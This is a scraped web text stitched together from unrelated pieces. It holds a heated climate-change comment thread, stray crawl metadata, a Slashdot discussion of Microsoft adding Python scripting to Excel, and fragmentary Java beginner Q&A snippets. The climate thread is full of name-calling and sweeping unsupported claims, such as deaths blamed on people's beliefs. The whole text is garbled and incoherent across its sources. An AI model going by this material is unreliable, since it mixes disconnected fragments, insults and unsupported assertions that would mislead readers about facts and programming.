the deny-o-sphere. You cannot expect logic and reason from people that reject basic science. But kudo for your efforts to bring rationality to this web site. REPLY: What you can expect though, is to be put in the bit bucket when you start calling people names, and make baseless taunts. Your claim about “reflecting basic science” should start here. – Anthony Thanks, you sound like a comforting voice from the wilderness. 25,000 died in the UK due to YOUR belief in Catastrophic Anthropogenic Global Warming and the UK/EU/US governments’ requirements that YOU support to “end it” (or control it) by deliberately increasing energy prices and deliberately restricting energy availability as YOU try to limit beneficial CO2 increases because YOU believe that CO2 must be limited. Now, why did they die? YOU. So, what is the hyperbole? They died. YOU caused those needless deaths because of YOUR beliefs in CAGW prevention that – unless limited by your actions – might cause harm in 2100. But. CO2 is not causing harm now. It is only creating good. It is increasing the life of every green plant on earth, and every living thing dependent on that plant for life. It is increasing the health and safety and life of each person using CO2 beneficially. And the potential harm that you fear is NOT occurring, and CANNOT be shown to be linked to any harm the past 18 years, the past 36 years, the past 360 years. . George, you have not answered any one argument or sentence of the previous post. Your post says RACookPE1978’s post is full of logical fallacies, but fail to name one. Before posting your answer, please just try to read, understand what RACookPE1978 said and then if there is a flaw explain it clearly to him. You say: “I can’t have a reasonable and rational discussion with someone who continually commits these fallicies ” but you do not even try. a rational debate. Why that? Are you so afraid of being proved wrong? Many people act out of what they sense to be “the right thing” and do not bear to look critical, logical at what are they doing. Is it really the right thing to do? You say: “My offer to assist you in developing a quantifiable alternative theory to the current theories of GW/CC scenarios still stands.” There is no need to develop new theories. Why should RACookPE1978 or anybody have to develop new theory to prove another wrong? The “catastrophic” GW theory (CAGW) is wrong, it is clearly failing to provide valid predictions. There are many flaws and false assumptions in the theory which are being highlighted again and again. So the question is why do you go to the lengths of ad hominem for a failed theory? The CO2 contribution to the warming itself might be well overstated: and feedbacks are clearly wrong. However the beneficial contributions from CO2 are clear for everybody who wants to look at: I have a BA in Political Science, a MA in Peace and Conflict Resolution and a Ph.D. in International Political Economy. All three disciplines are filled with reams of pseudoscience and unproductive methods of discourse, that distract from learning. My studies do not provide me the ability to argue the science behind climate change. However, they do give me a keen radar for word salad. This thread is a spectacular example of wasted effort, where good information is continuously obscured by absolutist statements and personal attacks. Lars, go back and read my responses to RACook and you will see “ad hominem,” “red herring,” and others. I agree with Eric on these comments. That’s why I am going elsewhere to seek solid information on Matt Ridley’s assertions. RichardsCourtney: You have your timing wrong. I made the comment about some people throwing around degrees BEFORE RGB responded with his very long, detailed and unnecessary vita. George Grubbs Your post at September 9, 2014 at 3:29 pm says in total Those lies are merely more of your trolling. At September 7, 2014 at 10:00 am you wrote saying in total Two days later rgbatduke replied to that at September 9, 2014 at 9:42 am in a message that began And you responded less than an hour later with a pack of lies at September 9, 2014 at 10:52 am which began No, you malign liar, as rgbatduke pointed out at September 9, 2014 at 3:31 pm you very specifically “questioned {his} credentials” when you wrote, “But what experience does he have in advanced applied mathematics (is he a PhD mathematician?), math modeling, computer simulation development/validation, computer software development, and big data analysis/data mining IN THE REAL WORLD?” But you did not withdraw. Instead, you had the brass neck to try to excuse your lies in your posts at September 9, 2014 at 3:53 pm and September 9, 2014 at 4:18 pm where you said you were “signing off” but did not. rgbatduke replied at September 10, 2014 at 8:48 am by providing additional CV. And then you started to throw around insults like confetti. At that I made a post in hope of stopping your disruption or – at least – avoiding your wasting more time and effort from rgbatduke because his time and effort are highly valued here. At September 9, 2014 at 10:05 am I wrote this post which says in total And that resulted in your post I am answering which – as I have itemised – consists entirely of lies. And, importantly, does not answer (nor mention) my question. You really, really are a most unpleasant and egregious troll. Please take your disruptive lies elsewhere. Richard I must say that many of these statements and purported arguments sound very much like they come from “Tea Party” true believers – those same type of arguments that try to shoot down the Theory of Evolution and surrepticiously try to sneak “Creationism” into our schools’ science curricula. RGB is the only commenter I have read that has said anything of substance, but his claims need to be validated. George Grubbs I must say that all of your statements and purported arguments sound very much like they come from the Mad Hatter’s Tea Party. Your statements are mostly falsehoods, say nothing of substance, and fail to withstand scrutiny. Richard Get real guys. Climate change is real and serious. We have increased CO2 levels worldwide by 50% in the last 100 years or so and we are paying the price already. We currently have no way of taking the carbon dioxide back out of the atmosphere and we have vastly reduced mother natures forests so we can’t expect much help from her. The worlds climate is not stable and we have pushed it too far. We need to stop pumping out more and get our grandchildren ready for a rough ride.
https://wattsupwiththat.com/2014/09/05/matt-ridley-in-the-wsj-whatever-happened-to-global-warming/
CC-MAIN-2017-13
refinedweb
22,720
59.13
Microsoft Considers Adding Python As an Official Scripting Language in Excel (bleepingcomputer.com) 181 An anonymous reader writes: Microsoft is considering adding Python as one of the official Excel scripting languages, according to a topic on Excel's feedback hub opened last month. Since it was opened, the topic has become the most voted feature request, double the votes of the second-ranked proposition. "Let us do scripting with Python! Yay! Not only as an alternative to VBA, but also as an alternative to field functions (=SUM(A1:A2))," the feature request reads, as opened by one of Microsoft's users.. Obligatory (Score:2) I just felt a great disturbance in the Net, as if millions of hackers were preparing to attack. Re: (Score:2) Be right back, I have to start a rumour that Microsoft is going to use Rust for something. With Excel + Python, (Score:5, Insightful) Re: (Score:3) Probably not any more than what one could accomplish with VB and Excel. I really don't think that Python would be something that non-programmers would really embrace. Even as a software developer I struggle to see the purpose of using a language where white space is significant. That is about my only real gripe with the language, but it's the one reason I don't know it very well, because I find an alternative I'm much more comfortable with for just about every project. Re: (Score:2, Insightful). Re:With Excel + Python, (Score:5, Interesting) nah, semicolons are there no matter what. Changing editors can *totally* mess up the whitespace. Yes, literal spaces will help, but all it takes is one idiot/mistake and the codebase is pooched. That and the fact that 2.x code can't run virtually unmodified on 3.x interpreters really pisses me off. Perl, for all its warts, just needs use perl4; at the top of the file right after the crunchbang and you're good to go with an old as dirt script on the newest interpreters. Re: (Score:1) Changing editors can *totally* mess up the whitespace. If you don't know how to operate your editor. Re: (Score:2) Honestly, of all my gripes with Python, the whitespace is pretty low. You learn about it in the first day or so and move on. Same with the 2-to-3 thing. While you are learning, chances are you will only be dealing with one version. When you need to support both, it's not that hard - most of the critical libraries have been back-ported to 2, so you just try importing things and catching exceptions, and do a few imports from __future__. If you stay cognizant of 3-only features, it's really not much work to ke Re: With Excel + Python, (Score:1) Re: (Score:2, Offtopic) Why? It's not a developer's job to become an editor guru but to code. Anything that interferes with that is wrong. Re: With Excel + Python, (Score:2) Re: (Score:2) You don't get it. Tools should be easy to use so you can focus on what you need to do, Programming Motherfucker! Re: With Excel + Python, (Score:2) Re: (Score:2) No. Just lazy in the right way. Now get to work playing with your tool. Re: (Score:2) Off topic? I was expressing an obvious point abut the toll assisting getting the job done instead of hindering it. Re: (Score:2, Insightful) You are _completely_ missing the point. Form should NOT matter for function. A compiler has one job -- translate code. It shouldn't matter if there is EXTRA (leading) whitespace for operations. There are times where placing multiple operations on one line make the code MORE readable; so yeah, having a statement separator is a big deal. It isn't 1970 anymore where we have to place 1 operation on 1 line. Some of us have evolved to writing code two dimensionally WHERE it makes sense too. Python, started off wit Re: (Score:2) The idit is you. As obviously millions of programmers use Phython and like it. Chances are: you are indenting your code the exact same why a Phython programmer does. If that is the case, that makes you look even more retarded. Re: (Score:2) > The idit is you. *irony* Failed spell checking when name calling *facepalm* Re: (Score:2) I belong to the lucky people that can read and comprehend stuff that has spelling errors. :D Because I'm so super enhanced in my visual cortex, I simply don't see them Static typeing and APIs (Score:2) Look at a piece of code you wrote. 90% of the statements will be on one line. So does it make more sense to use a character for new lines. Or one for continuations -- the 10% case. But far more important is that VBA has static typing which Python does not. That becomes very important as programs become larger. But far more important than that is that Microsoft have a new API for JavaScript (and I presume python) than the traditional COM/VBA one. And the new API is awful. But Micrsoft MBAs follow fashion, Re: (Score:3) VBA has static typing which Python does not. (a) Python has strong typing, just dynamic rather than static. Most Python developers would tell you, and I would agree, that you should be testing your code with unit tests and assertions, and catching type errors at runtime is acceptable. (b) Some Python developers, including the "Benevolent Dictator for Life" Guido van Rossum, feel that Python should have optional static typing, and it is now available. If you think it would help you, you can simply start usin Re: (Score:2) Sure, like VBA, Python checks types at runtime as well. But that is no replacement for static typing, which is the common case. By relying on automated tests with 100% code coverage you are saying that Python is only suitable for professional developers. VBA is mainly used by people whose expertise is not programming. It is really nice to know that once your code compiles, one large class of potential errors will be absent. And VBA could (but does not) be compiled to efficient code without relying on compl Re: (Score:2) you are saying that Python is only suitable for professional developers Actually, I never said any such thing. IMHO Python is just plain an all-around easy to use language that's easy to understand. Every language has some weird stuff that you just have to get past to understand how it works; Python has less of it than any other language I've used. My nephew was able to write working Python programs at age 10... he didn't spend any time on "automated tests with 100% code coverage" and yet his programs wor Re: (Score:2) you're focusing on the issue without also acknowledging when I point out *why* it's still an issue: all it takes is one idiot/mistake If I'm taking in code from others and one of those patches is crap then poof. As a result I have an extra layer of work (whitespace validation) for *all* contributors because some may be an idiot. That's my issue with the whitespace. Re: With Excel + Python, (Score:2) Re: (Score:2) why does the language add a fragility to the parser that is broken by something so easily? And note that the opposite issue, a dev that contributes to multiple projects will find that they have to maintain different editor profiles to match the projects' needs. All it takes is errantly working on a project with the wrong settings in the editor and the same issue manifests. In both cases the language has imposed a work penalty on the process of contributing code that can not be avoided. That is an issue. Re: With Excel + Python, (Score:2) Re: With Excel + Python, (Score:2) HTML canâ(TM)t handle Python spaces. Lots of systems will parse out spaces/tabs and have some conversion. Hence exchanging/saving code in Python is hard. Re: With Excel + Python, (Score:2) Re: (Score:3) Use tabs. If some idiot (or their editor) puts spaces in the code, search and replace them with tabs. It's not a problem. Re: (Score:2) why? it's not my job to clean up other's code. My job is to code. Re: (Score:2) Use spaces. If some idiot (or their editor) puts tabs in the code, search and replace them with spaces. Then find the idiot that put in the tabs and have them shot. It's not a problem. Re: (Score:2) Changing editors can *totally* mess up the whitespace. Not if you have been following Python's official standard (called PEP 8 [python.org]) and you have been using all spaces. I use vim, and vim has a setting to auto-expand tabs to spaces, plus I use the autoindent, so my code is always correctly indented and I never really need to think about it. Also, with Python 3, it's no longer just a warning if someone sabotages your white space by inserting some tabs; it's an error. So if someone does somehow sabotage the code b Re: (Score:3). Semicolons are a visible character and can be distinguished between other visible characters without regard to if the font used is fixed width or proportional. Spaces can't reliably be distinguished between other non visible characters (such as tab). Yes, spaces and tabs have a "visible" effect, but the characters themselves are not visible and how they are rendered on various display and print devices does not guarantee that you can visually determine the indent level (and consequently the scope or program Re: (Score:2) VBA does not use semicolons. It uses end of lines. Which is how people write code. Re: (Score:2) One of my gripes, other than the Fortran white space which was abandoned in F90, is the horrible way string handling done, though there are other things which are over convoluted. Reasonable languages consider regex a cross cutting concern. But in over objectioned languages it looks like: >>> import re >>> p = re.compile('[a-z]+') >>> p.match("") >>> print(p.match("")) While in Perl it looks like: $x="abcde" $result=~/abc/;print $result; Most programming languages know about cro Re: (Score:2) I think this is probably the reason Microsoft settled on VB in the first place. It's a far stretch from a perfect language, but it does have some nice qualities for managerial types such as no semicolons, case insensitive syntax, and white space isn't significant. Re: (Score:2) Big data analysis and AI like Python so adding it to Excel keeps Excel in the game....plus Excel is huge in quantitative analysis. Re: (Score:2) I wonder how many more applications my boss can dream up for Excel that it really should never, ever have been used for? Ironically, Python can make many spreadsheets unnecessary in the first place. In my case, for 90% of the things that I would have done in Excel circa 1995, today I instead just whip up a plain Python script to compute. Usually the results go into a flat text table, sometimes I even have it spit out a chart in SVG format. A script is typically much more readable and maintainable than a spreadsheet with a bunch of hidden formulas. It also fits better with version control systems. Re: (Score:3) Pandas with Numpy/Scipy has made it fairly simple to do a lot of things that I used to do in Excel, without the weirdness and performance limitations of Excel. Also, interactive charts... why doesn't Excel have these by now? Matlab figured it out like 20 years ago. Re: (Score:2) how? Re: (Score:2) Nothing for a very long time if they decide to go ahead. They introduced JavaScript as a VBA alternative in 2013. It's now 4 years later and while they've added a lot of APIs, there are still a ton left to go. Splitting their API resources between Python and JS seems like the perfect way to get neither any time soon (and a great way to bike shed both out of existence altogether). Yeah.... (Score:4, Funny) ... that won't result in increasing the attack surface. (eye roll) Re: (Score:2) Seems like being rid of VB script and replacing it with Python would be a security win. Re: (Score:2) Who said MS was getting rid of VB script? When all you have is a hammer (Score:2) I, for one, eagerly await reading about the new and exciting kind of WTFs that would result from this in The Daily WTF [thedailywtf.com] if this comes to pass. Great idea! (Score:2) Re: (Score:2) just imagine the ability to connect multiple AIs with this! One tensor flow connection per cell, cells referencing other cells. No wonder Skynet tries to kill humanity, we grew it in Excel! It all makes sense now! Good riddance to VBA (Score:2, Troll) I heartily agreed with Edsger Dijkstra when he said "the teaching of BASIC should be rated as a criminal offence: it mutilates the mind beyond recovery." The only reason why I've kept my VBA skills up is Excel - I find that I have to do a macro or two every three to six months and the process of getting my head around BASIC never seems to be simple and makes going back to C/C++/Python a chore. Hopefully WebAssembly will help me get rid of that other programming abomination that I have to deal with - Javascrip Good idea (Score:2, Insightful) Re: (Score:3) Is it a good thing to help idiots to build more powerful Office-powered clusterfucks? This is like building a cheap and reliable cell-phone-triggered detonator: In the most technical sense, you made an improvement, but what if you consider what they're used for? Re: (Score:2) Curious news (Score:2) Re: (Score:1) Anybody who uses .Net isn't going to bother writing programs in Excel. VS2017 is free, and includes VSTO. VSTO encourages using Excel files as data storage and not as scripting. Which is proper. Anyone who can use VSTO is going to write a separate program that consumes and emits data files, if that's a needed task, rather than embedding program and data into one binary clusterfuck. But all that being said, people who "just want it to work" are still clueless normies that are going to abuse broken designs and Re: (Score:2) Re:Curious news (Score:4, Interesting) Python is a .NET language. Microsoft's IronPython compiles to .NET and uses the .NET framework instead of Python's regular packages. And VB.NET is not really "a new version of VB6" at all - it's a whole different language that's more like C# with its syntax altered to visually resemble BASIC. It doesn't behave like VB at all. Re: (Score:1) Python is a .NET language. Microsoft's IronPython compiles to .NET and uses the .NET framework instead of Python's regular packages. I meant the properly-speaking .NET languages (C# & VB.NET), simply because I don't have too much experience in the other ones and I am not sure about how well they support all the .NET features. In any case, it seems [wikipedia.org] that IronPython isn't a Microsoft implementation. External libraries allowing a given programming language to communicate with .NET are relatively common, but that fact doesn't convert the given language into a .NET one. And VB.NET is not really "a new version of VB6" at all Seriously? Then, how do you call the transition from the old VB to the Re: (Score:3, Informative) VB.Net is .Net first and VB second. For example, if you type If foo = "1234" Then, it's doing some wonky-ass classic VB shit in the background (implemented in the Microsoft.VisualBasic namespace syntax shims) to allow variable foo to be an Int32 and still compare without a type mismatch. If, in C#, you try the same thing with if(foo == "1234") and foo is an int/Int32, it's going to flip its shit at compile time. But best of all, in either language, you can do If foo.op_Equality("1234") Then (or if(foo.op_Equ Re: (Score:2) VB.Net is .Net first and VB second. I never said otherwise. Anecdotally, when writing VB.NET code, I always rely on pure .NET rather than on VB functionalities. My whole point was that, regardless of the evident differences between both of them, VB.NET is the evolution of VB (or VB the old version of VB.NET). You might even consider the whole .NET (and consequently also C#) an evolution of VB; exactly the same than VB was an evolution of Basic. This was my whole point. Re: (Score:2) Re: (Score:2) Re: (Score:2) Why is /. so negative? (Score:5, Insightful) The way I see it, if Excel uses Python, it gives people more incentive to learn it and that can translate into people able to use it in other programs that use Python. Also, as someone who's had to troubleshoot broken VBA scripts on Excel, anything that can move us away from them is a win in my book. Re: (Score:2) Totally agree with you - the only thing I might comment on the suggestion that rather than Python, .NET languages would make more sense. VBA in Excel has always been horrible. Re: (Score:2) Totally agree with you - the only thing I might comment on the suggestion that rather than Python, .NET languages would make more sense. VBA in Excel has always been horrible. Well, there is Python for .NET (IronPython). Other than that I agree with you and the OP. Excel is an excellent tool for what it is supposed to be used. That people use it as a database, that's a WTF, but that has nothing to do with the value of Excel and its automation. It is the perfect tool for most what-if analysis needs. I've know plenty of people that added value to their work with VBA in the financial/insurance world. Python is a much better choice for this, when you need complex mathematical fun Re: (Score:1) Re: (Score:2) Bearing in mind the despicable behavior of MS throughout its history, can you blame people for airing negative views about this company whenever it is mentioned? MS is harvesting what it has sowed, and will carry on doing so for a long time. When the idea is actually interesting and requested by developers. I think I can blame them. If no one was requesting this feature and they added it, we might be wondering why they are even bothering but the fact is that there are people who are requesting this feature. Yes, they have a history of making their own versions of things but I'm sure they've also done good things and believe it or not, it's not everyone in the company that has bad intentions. I like to give them the benefit of the doubt on this Re:Why is /. so negative? (Score:4, Interesting) Re: (Score:2) It would be great if we could have portable macros too. MS Office, Libre Office, Google Docs etc. all capable of opening and running the same macros. Re: Why is /. so negative? (Score:2) If you need scripting in your spreadsheet youâ(TM)re better off using plain Python or R. Doing an ANOVA in 32000 rows and 20000 columns on Excel is wrong and makes people that support those people cry. How much Malware is distributed via Excel? (Score:3) Interesting all the comments regarding malware being distributed by Excel. Doing a quick search, the amount of malware distributed by Excel is on the rise. I guess it comes from downloading pre-made spreadsheets - something I guess I'm immune to because other than an expense spreadsheet mandated by an employer, I don't think I've ever taken a spreadsheet where I didn't know it's creator personally. In terms of adding macros from other sources, the one or two times I've done that they've ended up being more work to get functioning properly than writing them on my own. Could anybody comment on why this is such a big issue? Re: (Score:2) Could anybody comment on why this is such a big issue? I think that the main reason is that people don't understand how powerful Office macros really are. They can do many things, not just in the spreadsheet but everywhere on the computer. They are basically a program. The chances of a VBA script or a random executable to do something wrong on your computer are pretty much identical; but people might consider the first option less problematic and treat spreadsheets with macros more carelessly. Re: (Score:2) Re: (Score:2) Interesting all the comments regarding malware being distributed by Excel. Doing a quick search, the amount of malware distributed by Excel is on the rise. Could anybody comment on why this is such a big issue? It's really anything Microsoft as it's so distributed, more bang for your buck. Microsoft just doesn't get it, Word default "was" macros allowed, and the list extensive in this respect. I like the philosophy of Python (Score:1) Only one way to do anything. Not true... (Score:3) Only one way to do anything. Except that isn't true... for example you can format a string in several different ways. And then there is the different ways between 2 and 3. Perl's simple string interpolation is much easier and straightforward. The ultimate debugger (for non-devs) (Score:5, Interesting) To all those predicting doom and gloom: Excel doesn't fit the role of an IDE, it fits the role of the debugger. Sometimes, much better than a debugger integrated in the IDE. For those who know what we are doing, a spreadsheet is a wonderful tool for rapid prototyping business processes and gathering input from domain experts at the initial phase, when requirements are not at all clear and change quickly. Having a modern language friendly to exploration and prototyping would be a welcome addition. Wrong Language (Score:2, Interesting) Lua is more user friendly. It has less features, dynamic typing, starts at 1, doesn't care about whitespace, and was designed to be embedded within other things*. All those things are good qualities for people newish to programming. *Which'll improve its security compared to Python. You can easily remove function/modules from the language and you can isolate parts of a script from each other. It's trivial to load a new module and prevent it from accessing the I/O system. Re: (Score:2) Gee, a wrong language, use this other one post on Slashdot. What a surprise. It's a trap! (Score:2) It's a trap! Interesting but scary from a sysadmin perspective (Score:2) I do a lot of end user computing work, and that includes supporting some of the "applications" written in Excel and Access that have somehow managed to insert themselves into the flow of millions of dollars. Adding another language, especially a more open-ended one like Python is going to be an interesting backwards-compatibility exercise. The major problems we see with Office migrations are: - Add-ins, usually written by a long-gone consulting company and critical to some business process - VBA "applications" Um...OpenOffice anyone? (Score:5, Informative) Office suite + Python = OpenOffice. This is already a thing. [openoffice.org] Re: (Score:2, Informative) Ninja'd! I just checked and LibreOffice also supports Python for scripting (). As would be expected since Open/LibreOffice are essentially the same thing. Has been true for a long time, so Excel (just that, or is it possible in all Office components as in L/Ooffice?) is really just catching up here. Scripting can be done in Basic (equivalent but not identical to VBA), Javascript, Beanshell, and Python. Re:Python in Excel... (Score:5, Insightful) My gut reaction is YES YES YES because I'm often stuck in Excel for... reasons... and don't like VBA much despite being pretty good at it. But like you said, it probably won't be Python - it will likely be MS Python, stuck at some version forever and probably without nicey-nice stuff like the scientific libraries and package management that make it so useful. Re: (Score:2) Even the old versions of Python are pleasant to work with. In some ways, more so than more recent versions. I remember when decorators were introduced and meta-programming became all the rage. While I could appreciate their purpose, I was not thrilled about the increased complexity. That said, these features are optional. Re: (Score:2) It's not the Python version, it's the libraries. Freeze, say, Numpy or Scipy at their current version for 10 years. New libraries are unavailable... it largely loses it's appeal. Like Perl without CPAN. Re: (Score:2) Well, first thing is that it will probably be IronPython, so have fun even getting that stuff installed in the first place. Not that I'm too thrilled about this anyway. People already use Excel to do things that it really shouldn't be used for. Adding Python to the mix isn't going to help this any. Re: (Score:2) Adding Python to the mix isn't going to help this any. Ahh, but it will help those of us who are stuck using Excel to do things that it really shouldn't be used for :) Re: (Score:2) Uh...not, it will be vanilla python. Microsoft doesn't do that shit anymore. Re: (Score:2) Without package management and the critical scientific libraries (Pandas, Scipy/Numpy, etc.), it is not "vanilla" Python in any meaningful way. I suppose these libraries could all be saved with the file or they could add some kind of dependency management to Excel - but honestly, it just does not seem like we'll get a great result here. Hope you are right. Re: (Score:2) So, you are making shit up and then criticizing them for your made up shit? Re: (Score:2) Correct. I'm making up shit based on their past history. You should try it sometime, it's a very nice skill to have. George Bush even laid out the logic very eloquently once upon a time. Obligatory Archer (Score:1) Do you want to make insecure software? Because that's how you make insecure software. Re: (Score:2) Yes, as a matter of fact, I want to make insecure software. I can do this today in VBA, and it is quite useful. Opening and writing arbitrary files on the system and network is super-useful and I don't see why they would change that just because they add Python as a scripting language. Re: (Score:2) I never said Python would make things worst. All I said was that allowing such things is a terrible idea, whatever the language is. Re: (Score:2) OK, but it already exists, and making insecure software is highly useful. It's not like my data crunching script will be public-facing, and I most certainly don't want to jump through hoops to read and write arbitrary data. In any event, my bare Python scripts are less secure than my VBA running in Excel. If someone double-clicks a python script (or compiled exe), it will execute arbitrary code whereas Excel will make you click a box to execute a VBA macro. Re: (Score:2) wtf? scripting your data analysis in a spreadsheet makes insecure software? Re: Obligatory Archer (Score:3) Exactly. Why anyone would use computer software for automation is beyond me. Re:C# (Score:5, Informative) I have been wanting to be able to write C# to automate functions in an excel sheet. You can easily do that since long time ago. There are even different alternatives (e.g., relying on a template or creating everything on-the-fly). If I have to communicate with MS Office and I can choose how to do it, I would develop a C# or VB.NET application rather than relying on VBA. Re: (Score:1) This right here. And for that extra little bit of help in finding out how to "do it the right way", here's a wikipedia article that links to the correct toolset. From here, you can google the details. Visual Studio Tools for Office [wikipedia.org]
https://developers.slashdot.org/story/17/12/15/1133217/microsoft-considers-adding-python-as-an-official-scripting-language-in-excel
CC-MAIN-2018-13
refinedweb
4,821
73.58
more doubts sir. - Java Beginners own browser.Hope you will help me out.And also sir i need the progressbar...more doubts sir. Hello sir, Sir i have executed your code.... Thanking you! FAYAZ servlet n jsps - Java Beginners servlet n jsps How to do: 1.After log-out, if user cilick on "back...:// Thanks. hello, 1 = you can disable the back button of the browser. 2 == through session listner you can expire hi sir - Java Beginners hi sir Hi,sir,i am try in netbeans for to develop the swings,plz... the details sir, Thanks for ur coporation sir Hi Friend, Please visit the following link: what is the meaning of abstract? what is the meaning of abstract? what is the meaning of abstract what is the meaning this coad? what is the meaning this coad? what is the meaning this coad? Example Form example form = (Example Form) form implements runnable n extends thread - Java Beginners implements runnable n extends thread what is the difference between implements runnable n extends thread? public class...(); class...; private int num; StringThreadImplement(String s, int n){ str = new String(s what is the meaning of this or explain this what is the meaning of this or explain this List<Object[]> list=query.list(); Hi Friend, It will return the query values in the form of list. For more information, visit the following link: Hibernate Meaning of invoice Meaning of invoice hello, What is the meaning of invoice? hii, Invoice is a statement which contains the following listed things. Invoice Number Invoice date Name and address of the person Name and address What is the special meaning of __sleep and __wakeup? What is the special meaning of __sleep and __wakeup? What?s the special meaning of _sleep and _wakeup please do respond to my problem sooooon sir - Java Beginners to open the link also in my own browser.Hope you will help me out.And also sir i need...please do respond to my problem sooooon sir Hello sir, Sir i have... out. Thanking you! FAYAZ. Hi friend, i am sending progressbar hello sir, please give me answer - Java Beginners hello sir, please give me answer Write a program in Java that calculates the sum of digits of an input number, prints... ways in java? so , sir... you know how the next two while loops works Meaning Of annatations and use - Java Interview Questions Meaning Of annatations and use Hi all use of Annatations and exat meaning of annatations we create our own annatations give an Example...(); } Annotating the code (Annotation) Example (showSomething="Hi! How r you") public void What would you rate as your greatest weaknesses? What would you rate as your greatest weaknesses.... Be mindful of what you say. If you admit to a genuine weakness, you will be respected... of the question 1 when you start the interview. Once you know what is required. Tattoo Ideas for Girls with Meaning with meaning, before getting a tattoo. What can you say a girl with a tattoo...Tattoo Ideas for Girls with Meaning: Tattoos with deep meaning While many tattoos are just creative work of art, some text tattoos have a deeper meaning What?s the special meaning of __sleep and __wakeup? What?s the special meaning of __sleep and __wakeup? What?s the special meaning of _sleep and _wakeup swing program plz urgent sir - Java Beginners swing program plz urgent sir hi sir,i waan a jtable swings program table having column names "itemid","price".Initially table having single empty row.whenever we click the "enter" button automatically new row will be insert You know - Java Beginners You know Hi Rajnikant you know php...if you know php then please write the code and send me. My query is I have three table Consigne... table is the main table and all data would be fill manually. In the consign sir   would you please help me? would you please help me? Write a class Amount which stores sums of money given in pounds and pence. Your con- structor should take two ints.... If a withdrawal would make the balance less than zero, your class should print What is Java - Java Beginners What is Java What is Java and how a fresher can learn it fast? Can any one share the fastest learning tips for Java Programming language? Thanks! Hi,Java is one of the most popular programming language. You can learn If you came on board with us, what changes would you make in the system? If you came on board with us, what changes would you make in the system.... You may be very bright, but no one can really understand what needs to be done... in this organization is stupid. Your answer should therefore reflect that you would like a java program - Java Beginners a java program well sir, i just wanna ask you something regarding...); } System.out.print("would you like to Continue y or n:"); str=br.readLine... for more information. Please guide me sir - EJB 3.0 or should learn Spring and Hibernate.I am confused what should i do learn.... Answers Hi friend, you can learn very easy way. Read for more Why would we want a Database? Part-3 : Why would we want a Database? Most of the beginners are asking... the website your client want to change the design of the website. Then, what will you do... how useful the database is, when you are making a dynamic website. It provides Hello Sir I Have problem with My Java Project - Java Beginners Hello Sir I Have problem with My Java Project Hello Sir I want Ur Mail Id To send U details and Project Source Code, plz Give Me Ur Mail Id diff betn show n visible diff betn show n visible what is difference between show() & visible method in java What is singleton? - Java Beginners What is singleton? Hi, I want to know more about the singleton in Java. Please explain me what is singleton in Java? Give me example of Singleton class. Thanks hello, Singleton is a concept in which you characters java - Java Beginners you input that word) The word howdy has 5 characters. What letter would you...) There are 0 A's. What letter would you like to guess?(Enter zero to quit.) b (sample you input that letter) There are 0 B's. What letter would you like to guess. what is xfire? - Java Beginners what is xfire? What is XFire? I found it?s a free gaming... allow your friend to join too. Search Internet if you want to learn it. ... and the CXF website.Codehaus XFire is a next-generation java SOAP framework When would you use the Builder Pattern? When would you use the Builder Pattern? When would you use the Builder Pattern why we use ^ operator in sql, and what is the meaning of that operator? why we use ^ operator in sql, and what is the meaning of that operator? why we use ^ operator in sql, and what is the meaning of that operator java error - Java Beginners :deprecation for details. Hello Sir ,What is the meaning of above lines ,how i can...java error G:\threading>javac threadmethods.java Note...; Hi Friend, You are using any deprecated method or something that has What do you mean by Serialized? What do you mean by Serialized? What do you mean by Serialized? Hi, It is the part of the isolation level , Its bassically use... until the current transaction finishes. No new data can be inserted that would What is JavaScript? there career in Java. For java programming beginners always try to know What is Java script and other java related queries. How to define what is JavaScript? Thanks, Hi, For Java programmers its very necessary to know "What servlet - Java Beginners servlet for servlet study which book is good.plz tellme as soon as possible. Hi Complete Reference is good book. i think sanjay you can learn more detail here, This is what i need - Java Beginners This is what i need Implement a standalone procedure to read in a file containing words and white space and produce a compressed version of the file...)as (Iliketoplayfootball) without any compressing the file. thank you Hi What do you mean by Read Committed? What do you mean by Read Committed? What do you mean by Read Committed? Hi, Data records retrieved by a query are not prevented from modification by some other transactions. Non-repeatable reads may occur, meaning Would you initialize your strings with single quotes or double quotes? Would you initialize your strings with single quotes or double quotes? Would you initialize your strings with single quotes or double quotes We would like to hear about your goals. would also need to research about what you might need in such a product. I can do.... Would you be able to tell me what that is?” You can also say “I am sure... this product already, why would you have gone for it? Apart from that? Is there any determinant of n*n matrix using java code determinant of n*n matrix using java code Here is my code... { double A[][]; double m[][]; int N; public input() { Scanner s=new Scanner(System.in); System.out.println("enter dimension of matrix"); N java program - Java Beginners java program plzzzzz help me on this java programming question? hello people.. can u plzzzzzzzzzzzzzzzzzzz help me out with this java programm. its... of this would be really great...... and i dont mind if u can give me the whole what is meta data in java what is meta data in java what is meta data in java Use ArrayList when there will be a large variation in the amount of data that you would put into an array. A disadvantage of a ArrayList is that it holds only what technique - Java Beginners what technique what technique or algorithm i need to use to develop a system a scheduling time table in java word program - Java Beginners you input that word) The word howdy has 5 characters. What letter would you... A's. What letter would you like to guess?(Enter zero to quit.) b (sample you input that letter) There are 0 B's. What letter would you like to guess What do you mean by platform independence? What do you mean by platform independence? Hi, What do you mean... of java language that makes java as the most powerful language. Not even a single language is idle to this feature but java is more closer to this feature What is command line argument in Java in Java and how one can use it to create a program in Java? Can you post any... visit the following link: beginners - Java Beginners java beginners what is StringTokenizer? what is the funciton... the following links: What is composition? - Java Beginners What is composition? Hi, What is composition? Give example of composition. Thanks what are the loopholes in java - Java Beginners what are the loopholes in java what are the loopholes in java What Is Thread In Java? What Is Thread In Java? In this section we will read about thread in Java... Thread in Java has implemented with the same meaning that actually... a simple example which will demonstrate you about how to write thread in Java. Here java - Java Beginners Java array add What is array and how can i add an element into an array in Java? IT would be nice if you can give an example.Thanks Sum of first n numbers Sum of first n numbers i want a simple java program which will show the sum of first n numbers.... import java.util.*; public class... Scanner(System.in); System.out.print("Enter value of n: "); int n what is this.. - Java Beginners what is this.. what is the differece between platform independant and platform dependant? Hi Friend, Difference: Platform Independent means not restricted to particular Opearting System environment from program print hello n hi print hello n hi how to write a java program that prints "hello" 5 times, "hi" 1 time n again "hello" 4 times..?? do reply what is a indentifier - Java Beginners what is a indentifier What is an identifier and what is the definition? An identifier is an unlimited-length sequence of Java letters and Java digits, the first of which must be a Java letter. An identifier cannot java - Java Beginners java Hai.... Sir......... My java code is Pasted below... = new Label("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n TEXTURE FEATURES \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",Label.CENTER); Label Label4 = new Label readline Error - Java Beginners (). You would have to to enter 'nn' for the code to exit. I think the problem... world, you would see the text 